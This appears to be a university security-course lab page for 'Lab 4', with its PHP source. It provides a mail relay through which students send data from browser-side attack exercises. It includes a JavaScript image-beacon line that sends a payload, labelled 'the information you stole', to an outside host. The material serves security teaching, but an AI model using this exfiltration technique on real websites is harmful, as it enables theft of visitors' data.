You can use this server side script to send automated emails from client-side JavaScript. For example, clicking this client-side hyperlink will cause an email to be sent by our web server (css.csail.mit.edu). Another copy of the email always goes to 6858-sendmail@lists.csail.mit.edu so that we can monitor abuse and you can receive credit for your work. (Don't worry about spamming our account while you test out your exploits; we will ignore mail to that address until we actually grade your submissions.)
(new Image()).src='https://css.csail.mit.edu/6.858/2020/labs/sendmail.php?' + 'to=your-mit-username@mit.edu' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
In case you are curious, here is the source code of this page.
<?php
do {
if (!array_key_exists("to", $_REQUEST)) {
break;
}
$to = filter_var($_REQUEST['to'], FILTER_SANITIZE_EMAIL);
if ($to === false) {
header("HTTP/1.0 400 Bad Request");
echo "Invalid e-mail address given in to field";
return;
}
if (!array_key_exists("payload", $_REQUEST)) {
header("HTTP/1.0 400 Bad Request");
echo "No payload given";
return;
}
$payload = $_REQUEST['payload'];
if (empty($payload)) {
header("HTTP/1.0 400 Bad Request");
echo "Empty payload given";
return;
}
if (strlen($payload) > 100) {
header("HTTP/1.0 413 Payload Too Large");
echo "Payload is larger than 100 bytes";
return;
}
if (!function_exists('apcu_add')) {
header("HTTP/1.0 501 Not Implemented");
echo "APCu not enabled, so no rate limiting; refusing all requests";
return;
}
if (apcu_add($payload, true, 5) === false) {
// exact same $payload was sent in the past 5 seconds
header("HTTP/1.0 429 Too Many Requests");
echo "That exact payload was sent very recently; rejecting";
return;
}
if (substr(strrchr($to, "@"), 1) !== "mit.edu" &&
substr(strrchr($to, "@"), 1) !== "ll.mit.edu") {
header("HTTP/1.0 403 Forbidden");
echo "Please use an @mit.edu e-mail address";
return;
}
$grading = stristr($_SERVER['HTTP_USER_AGENT'], "Lab Grader");
$logload = str_replace(array("\n", "\r"), '\n', $payload);
$logged = true;
if ($grading) {
$logged = $logged && openlog("6858.sendmail.grader", 0, LOG_MAIL);
$logged = $logged && syslog(LOG_NOTICE, "$to $logload");
} else {
$logged = $logged && openlog("6858.sendmail.students", 0, LOG_MAIL);
$logged = $logged && syslog(LOG_INFO, "$to $logload");
}
$logged = $logged && closelog();
if (!$logged) {
header("HTTP/1.0 503 Service Unavailable");
echo "Failed to log mail request; not sending";
return;
}
if ($grading) {
header("HTTP/1.0 202 Accepted");
echo "Payload logged";
return;
}
$from = $to;
$subject = "Message from $from";
$message = "Payload:\n\n$payload";
if (!mail($to, $subject, $message)) {
header("HTTP/1.0 503 Service Unavailable");
echo "Failed to relay e-mail to e-mail server";
return;
}
echo "Sent!";
return;
} while(0);
$link = "(new Image()).src="
. "'https://css.csail.mit.edu/6.858/2020/labs/sendmail.php?'"
. " + 'to=your-mit-username@mit.edu'"
. " + '&payload=some-string' + '&random='"
. " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="labs.css" />
<title>Lab 4 Email Script</title>
</head>
<body>
<h1>Lab 4 Email Script</h1>
<p>
You can use this server side script to send automated emails from
client-side JavaScript. For example, clicking this client-side
hyperlink will cause an email to be sent by our web server
(css.csail.mit.edu). Another copy of the email always goes to
6858-sendmail@lists.csail.mit.edu so that we can monitor abuse and
you can receive credit for your work. (Don't worry about spamming
our account while you test out your exploits; we will ignore mail
to that address until we actually grade your submissions.)
</p>
<pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
<p>
The random argument is ignored, but ensures that the browser
bypasses its cache when downloading the image. We suggest that you
use the random argument in your scripts as well. Newlines are not
allowed in <tt>javascript:</tt> links; if this bothers you, try
<a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
</p>
<h2>Test form</h2>
<p>
If you just want to try out the script, you can use this form.
(For your actual attacks in lab 4, you'll probably want to use the
JavaScript image technique shown above.)
</p>
<form method="GET" action="">
<label for="to">To:</label><br />
<input name="to" placeholder="your-mit-username@mit.edu" size="40" />
<i>(@mit.edu e-mail address)</i>
<br />
<br />
<label for="payload">Payload:</label><br />
<input name="payload" placeholder="some-string" size="40" />
<i>(the information you stole)</i>
<br />
<input type="submit" value="Send Email" name="send_submit" />
</form>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>